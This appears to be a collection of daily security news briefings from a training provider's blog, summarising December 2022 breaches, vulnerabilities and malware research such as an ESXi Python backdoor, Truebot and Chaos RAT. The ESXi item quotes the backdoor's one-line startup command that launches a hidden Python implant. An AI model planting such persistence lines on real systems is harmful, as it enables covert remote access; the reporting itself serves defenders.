The FBI, in conjunction with the UK National Crime Agency and the Netherlands Police, has launched a campaign using ads placed in search engines, triggered by the keywords associated with DDoS activities - the idea being to deter naive would-be-criminals searching for DDoS services and educate the public on their illegality.
Mrozek, Thom, Federal Prosecutors in Los Angeles and Alaska Charge 6 Defendants with Operating Websites that Offered Computer Attack Services, news release, 14 December 2022. Available online at https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
TPG Exchange Servers Breached
Australian telco TPG Telecom has notified the Australian Stock Exchange (ASX) that their security consultants, Mandiant, had found evidence of unauthorised access to a hosted Microsoft Exchange service which hosts email accounts for up to 15,000 business customers of their iiNet and Westnet brands. The announcement gave no indication of the timeframe of the breach - only that it was discovered on 13 December as part of "Mandiant''s ongoing engagement to assist with cyber protection" during which they conducted a "forensic historical review and discovered the unauthorised access".
The analysis revealed that the primary purpose of the threat actor was to search for customers' cryptocurrency and financial information. The unauthorised access has been blocked, additional controls put in place, and all affected customers are being contacted.
2022 has been a bad year for Microsoft Exchange users; one wonders why they keep using it. . .
Rickards, James, Unauthorised access to Hosted Exchange service, market announcement, 14 December 2022. Available online at https://www.asx.com.au/asx/statistics/displayAnnouncement.do?display=pdf&idsId=02612242.
Australia Considers Sanctions on Medibank Hackers
Having introduced Magnitsky Act-like laws to permit international sanctions, the Australian Government is now considering using them against cybercriminals for the first time. The government has previously sanctioned Iran's 'morality police' as well as Iranians and Russians linked to human rights abuses.
The Department of Foreign Affairs and Trade has provided advice to the Minister, Penny Wong, about possible use of these cyber-related powers. In a response tabled to a Senate question on notice, the Department stated, "The department routinely provides advice to ministers on possible sanctions measures, including cyber sanctions".
Hurst, Daniel, Russian Medibank hackers could be first targets of Australian sanctions against cyber-attackers, The Guardian, 15 December 2022. Available online at https://www.theguardian.com/australia-news/2022/dec/15/russian-medibank-hackers-could-be-first-targets-of-australian-sanctions-against-cyber-attackers.
InfraGard Member List Compromised via Social Engineering
The FBI runs a threat information sharing network called InfraGard which has more than 80,000 members, who are supposed to be vetted individuals in security roles - both physical and cyber - at private sector critical infrastructure companies. Now the InfraGard portal and membership database has been breached by a simple, but audacious, social engineering attack.
Security blogger Brian Krebs reports that a thread offering the InfraGard database for sale was posted to a relatively new cybercrime forum called 'Breached'. The database contains the names and contact information for tens of thousands of InfraGard members. The seller is using the handle 'USDoD', with the Defense Department's seal as their avatar, and is asking for $US50,000 - perhaps a bit optimistically, considering much of the information is already publicly available.
The breach was accomplished by submitting a phony membership application using the name, Social Security Number, date of birth and other personal details of a finance corporation CEO. InfraGard requires identity verification by either email or telephone - and while the attacker controlled a suitable email address, they chanced using the CEO's genuine mobile phone number. They got lucky: a month later they received an email stating that their application had been approved.
From there, the attacker had a friend write a Python script to query an API on the InfrGard website, and the data was theirs. As Krebs wrote his article, USDoD still had access to the InfraGard site and was using it to message members.
Krebs, Brian, FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked, blog post, 13 December 2022. Available online at https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/.
FortiOS 0day Exploited In The Wild
Fortinet has been having a bad year, and this continues as the company has issued an advisory for a heap-based buffer overflow in the SSL VPN component of their ForiOS software. The vulnerability will allow a remote unauthenticated attacker to execute abitrary code or commands via specially-crafted requests.
The advisory provides multiple IOC's which customers should immediately check for; the recommended workaround is to disable the SSL VPN service. The permanent fix is, of course, to upgrade to a later version of FortiOS.
Fortinet PSIRT, FortiOS - heap-based buffer overflow in sslvpnd, PSIRT advisory, 12 December 2022. Available online at https://www.fortiguard.com/psirt/FG-IR-22-398.
Citrix ADC and Gateway Exploits In The Wild
Citrix has released builds to fix a critical vulnerability, CVE-2022-27518, which affects Citrix ADC and Citrix Gateway versions 12.1 and 13.0 which are configured with a SAML SP or IdP configuration. Version 13.0-58.32 is not affected. This vulnerability is being exploited in the wild and customers are urged to update as soon as possible or take other measures to mitigate the problem.
CVE-2022-27518 is an "improper control of a resource through its lifetime" vulnerability - probably a memory problem such as use-after-free or similar - which allows an unauthenticated attacker remote code execution.
The National Security Agency has also issued a guidance document with advice on threat hunting steps Citrix customers can take to look for artifacts on their devices which may be attributed to APT5, also known as Keyhole Panda, UNC2630 and MANGANESE.
Lefkowitz, Peter, Critical security update now available for Citrix ADC, Citrix Gateway, blog post, 13 December 2022. Available online at https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/.
National Security Agency, APT5: Citrix ADC Threat Hunting Guidance, guidance document, 13 December 2022. Available online at https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Python Backdoor Gives Access to VMware ESXi Servers
VMware's ESXi is a popular virtualization platform with a lightweight UNIX-like host OS; it loads a near-fresh root filesystem into RAM on reboot, with only a very few files being preserved through the reboot process. One of these is the /etc/rc.local/local.sh file, which allows customization of the startup process, although it is normally empty other than for a few comments explaining its purpose.
In October, Juniper Threat Labs researchers discovered a backdoor implanted into an ESXi server; the attacker had added 8 lines of code in /etc/rc.local/local.sh, which in turn added a single line of code to another startup file, /bin/hostd-probe.sh and then reset the mtime and atime on the modified file to that of the original, in order to evade detection. That single line of code launches a Python program:
bin/nohup /bin/python -u /store/packages/vmtools.py >/dev/null 2>&1&
Being Python code, that program could run on any POSIX-style platform, but there are indications it is ESXi-specific: the filename is a giveaway, as is a VMware copyright statement at the top of the code, both intended to distract anyone investigating. When run, the code launches a simple web server which will accept password-protected POST requests to either run arbitrary commands and display the result as a web page, or to launch a reverse shell to the attacker's netcat listener. Curiously, this web server binds to localhost:8008, and so the attackers also reconfigure the ESXi reverse HTTP proxy in order to redirect requests to their server.
The initial compromise which allowed installation of the backdoor could not be determined, but the default port number for the reverse shell is 427 which, perhaps not coincidentally, is also the port for OpenSLP, the implementation of the Service Location Protocol used on ESXi, and this is quite probably the service which was exploited to gain access.
The Juniper blog post provides suggested mitigations and pointers to likely IOC's.
Langton, Asher, A Custom Python Backdoor for VMWare ESXi Servers, blog post, 9 December 2022. Available online at https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers.
Chrome Adds Passkey Support
Google has announced that passkey support is now available in Chrome Stable M108, for the Windows 11, macOS and Android platforms. The Android implementation will sync passkeys securely via the Google Password Manager (or, in upcoming versions of Android, any other password manager that supports passkeys).
Passkeys are intended to replace the use of passwords, with all their problems and vulnerabilities, with the use of public-key authentication - passkeys are far more secure, are not leaked in server breaches, and cannot be phished. However, they require web sites and applications to support the W3C WebAuthn API, which is rapidly being deployed on popular sites.
A passkey saved on a device will automatically show up in autofill when the user signs in to a site, and on a desktop device the user can also use a passkey from a nearby mobile device; the browser will relay the authentication traffic between the remote server and the mobile device. In all cases, the private key component of the passkey never leaves the mobile device (rather like the way SSH supports agent forwarding).
Sarraf, Ali, Introducing passkeys in Chrome, Chromium blog, 8 December 2022. Available online at https://blog.chromium.org/2022/12/introducing-passkeys-in-chrome.html.
French Retailer Intersport DOS'ed by Hive Ransomware
Black Friday sales at the French stores of sports retail giant Intersport were badly disrupted when cash registers were shut down and loyalty card and gift card services were also unavailable. Store staff were forced to keep paper records and perform checkouts manually, causing delays.
The cause was a ransomware attack on 23 November, for which credit has been claimed by the Hive ransomware-as-a-service group on its leak website; just why the Hive group has done so is unclear: it might be to encourage Intersport to negotiate the ransom. Intersport would not elaborate, but says it does not believe customer data had been accessed.
Cluley, Graham, Hive ransomware gang claims responsibility for attack on Intersport that left cash registers disabled, blog post, 13 December 2022. Available online at https://www.bitdefender.com/blog/hotforsecurity/hive-ransomware-gang-claims-responsibility-for-attack-on-intersport-that-left-cash-registers-disabled/.
Botnet Brute-Forces WordPress Sites
FortiGuard Labs has provided an analysis of a newly-discovered botnet which is scanning for and then brute-forcing self-hosted WordPress CMS sites. Once the botnet has managed to chance upon credentials which give it access to a site, it then infects the site with a copy of itself and then contacts its C2 server.
GoTrim is written in the Go programming language, and takes advantage of that language's concurrent programming features to perform multiple tasks simultaneously. It is also statically linked, so that when it erases itself, no trace is left behind - although this means that it also does not persist on the victim system. It checks to see if the site is hosted on wordpress.com, and if so it moves on, preferring to focus on self-hosted sites which are generally less well defended.
The backdoor can operate in two modes - client mode, in which it sends HTTP POST requests to its C2 server, or server mode, in which it listens for POST requests. It can also detect other CMS's, as well as the open-source e-commerce merchant server, OpenCart.
FortiGuard Labs, GoTrim: Go-based Botnet Actively Brute Forces WordPress Websites, blog post, 12 November 2022. Available online at https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
JSON Allows SQL Injection to Bypass Web Application Firewalls
Claroty's Team82 has developed a generic technique which allowed them to bypass web application firewalls while delivering SQL injection payloads.
SQL injection remains one of the leading vulnerabilities in web applications, in large part due to the constant demand for web developers who, without proper security education, copy code fragments from sites like Stack Overflow without realising that the code fragments are just that - fragments intended to demonstrate a technique, and not fully-formed code ready to be copied and pasted into your finished application code (a 2018 study suggested that roughly 50% of answers to PHP questions contain SQL injection vulnerabilities).
The correct fix, of course, is to educate developers, but in the meantime most users depend on web application firewalls, which can detect and block a range of attacks on web applications. However, the technique developed by Team82 works by prepending JSON syntax to the SQL injection payloads - and because many WAF's lack JSON support (even though databases added JSON support many years ago) this threw the parser component of the WAF for a loop, allowing the SQL injection to pass.
The technique worked on all but one WAF the researchers tested, and after they notified the vendors, their products have had JSON support added. The Team82 researchers also added support for the technique to the popular SQLMap open-source exploitation tool, for use by penetration testers.
Moshe, Noam, {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF, blog post, 8 December 2022. Available online at https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf.
Laurent22, Potential SQL injections vulnerabilities in Stack Overflow PHP questions, automated analysis report, July 2018. Available online at https://laurent22.github.io/so-injections/.
New Waves of Truebot Attacks
Cisco Talos security researchers are reporting an increase in infections by Truebot (also known as Silence.Downloader). Previously, Truebot has been spread via malmails and mainly infected desktop/laptop systems inside corporate networks. The new wave is using two new initial infection mechanisms.
In August, the researchers noticed a small number of cases in which Truebot was run following the exploitation of a vulnerability in the IT asset management product Netwrix Auditor. However, since this tool is not widely used on Internet-facing systems, this remained a limited infection. However, in October a second wave of infection started, this time delivered via Raspberry Robin malware, which usually spreads via USB drives. Between them, these two infections have assembled a botnet of over 1,000 systems worldwide, with a particular focus on Mexico, Brazil and Pakistan. Since November, the attackers have switched to an as-yet-unknown delivery mechanism which has infected over 500 Internet-facing Windows servers in the US, Cana and Brazil.
Post-compromise, the current versions of Truebot download either Cobalt Strike reverse shell or Grace malware payloads, typically followed by a custom 'Teleport' exfiltration tool. However, in some cases, the threat actors go on to deploy Clop ransomware as part of a double extortion attack.
These campaigns seem to involve two different groups: Silence Group, who are originally responsible for Truebot, and TA505, a.k.a. Evil Corp, who are associated with the Grace malware.
Pereira, Tiago, Breaking the silence - Recent Truebot activity, threat advisory, 8 December 2022. Available online at https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/.
Linux Servers Targeted for Cryptomining and More With Chaos RAT
For some time, cryptojacking threat groups have been targeting Linux instances in the cloud, generally using the same sequence of actions after gaining initial access: kill off any competing malware and security products, establish persistence and then execute a Monero cryptominer. But in November Trend Micro researchers observed a new pattern of activity: in this case, a remote access trojan called Chaos (Trojan.Linux.CHAOSRAT) is installed along with the XMRig miner.
The infection ensures persistence by setting up a cron job which will keep downloading and reinstalling itself from Pastebin every 10 minutes, and also installs itself in different locations to further evade removal. The other payload download C2 server is hosted in Russia, but once the Chaos RAT is installed, it connects to a C2 server which appears to be in Hong Kong, reporting detailed configuration of the infected machine.
The RAT is written in Go and has quite comprehensive capabilities: it can provide a reverse shell, upload, download and delete files, take screenshots, restart or shut down the computer. This suggests that this threat actor is considering broadening their activities from just cloud-based cryptomining.
Fiser, David and Alfredo Oliveira, Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT, blog post, 12 December 2022. Available online at https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html.
UNSW Resets Qbits With Maxwell's Daemon
A story that slipped under our radar for a while: Every student who studies thermodynamics encounters Maxwell's Daemon, a thought-experiment daemon which, by opening a door between two chambers when a highly-excited particle approaches it and closing the door to slow ones, can create a temperature difference between the two, thereby driving a heat engine and achieving - in theory - perpetual motion. Such a daemon is impossible, of course - the daemon itself needs to consume energy to observe the particles and move the door.
But in a modern twist on the idea, quantum computing engineers at University of New South Wales have achieved something similar, using a fast digital voltmeter to observe the temperature of electrons drawn from a warm pool of electrons. In doing so, they make the electron much cooler than the pool it came from, which corresponds to it being in the '0' state.
This is the basis of their new technique for resetting the state of electron spin silicon qubits. The old technique works by cooling electrons to a temperature near absolute zero, and hoping that all the electrons 'relax' to the '0' state, but this still leaves a 20% probability that the electron will be a '1'. The new technique reduces the probability of error to 1% - a major step in improving the reliability of quantum computers.
UNSW Media, New quantum computing feat is a modern twist on a 150-year-old thought experiment, news release, 30 November 2022. Available online at https://newsroom.unsw.edu.au/news/science-tech/new-quantum-computing-feat-modern-twist-150-year-old-thought-experiment.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.